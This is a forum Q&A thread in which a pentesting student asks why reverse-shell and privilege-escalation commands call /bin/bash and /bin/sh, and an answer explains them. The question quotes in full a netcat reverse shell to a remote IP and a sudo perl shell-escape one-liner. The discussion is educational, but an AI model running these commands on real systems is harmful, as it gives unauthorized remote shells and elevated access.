Using /bin/ in some pentest situations

Question

During my Pentester learning, I have noticed a lot about using /bin/ in some situations and in certain commands, such as in a reverse shell:

nc -nv 192.168.0.6 1234 -e /bin/bash

and for example, when it comes to climbing privileges on a machine:

sudo /usr/bin/perl -e 'exec "/bin/sh"'

I tried to search the internet and watch several videos, but they never explain how this folder works in these situations, WHY I need to run /bin/bash at reverse shell time, or why /bin/perl and /bin/sh was used ?

Do you want to know why those particular programs are run or why they are specified with absolute rather than relative paths? — Daniel Junglas, Jan 09 '20 at 07:48
I want to know why they are called, for example why the netcat command is calling from the bash file — Vinni Marcon, Jan 10 '20 at 00:36

score 0 · Answer 1 · answered Jan 18 '20 at 20:46

Pentesting is all about using the tools available to you in order to accomplish a goal.

In your first example, you're opening a reverse shell. We listen for an incoming connection with netcat, but we want to do more than listen - we want that incoming shell to be interactive. To do that, we use the -e option to pipe the incoming connection to our local bash prompt. You could just as easily use sh or zsh or whatever you have in this situation. It should be noted that the -e option is not present on most netcat installs, so this is just one example of a reverse shell, and you should have many ready to go - some will work and some won't.

In your second example, we're escalating privilege's with perl, a binary we found we can access on the remote machine without elevated privilege's. We ultimately want to interact with the remote host at higher privilege's than we already have, and in many cases something like perl may do that for us (for many arbitrary reasons too!). We can take advantage of this fact, combined with the fact that perl lets us run arbitrary code, to run a snippet of perl code:

exec "/bin/sh"

The exec command in perl will run an executable, in our case the /bin/sh shell. This shell will run at perl's privelege level, so we've effectively opened a shell at higher priveleges than we had previously.

Perl's -e option is invoking a script or line of perl to run, and it is just coincidence that both commands have -e. They mean separate things.

Takeaway: There are many reasons you'll be entering commands to do various things. There's a ton of reverse shells, an infinite amount of ways to escalate your privelege, and a million different enumeration techniques. As you're given commands to run, take a minute to check the documentation for the command to find what each flag does, why you're using those parameters, and how its working. Taking notes as a pen tester will move you forward faster than any other technique, because Pentesting is a numbers game - you want to try as many things as possible to see what works.

Using /bin/ in some pentest situations

1 Answers1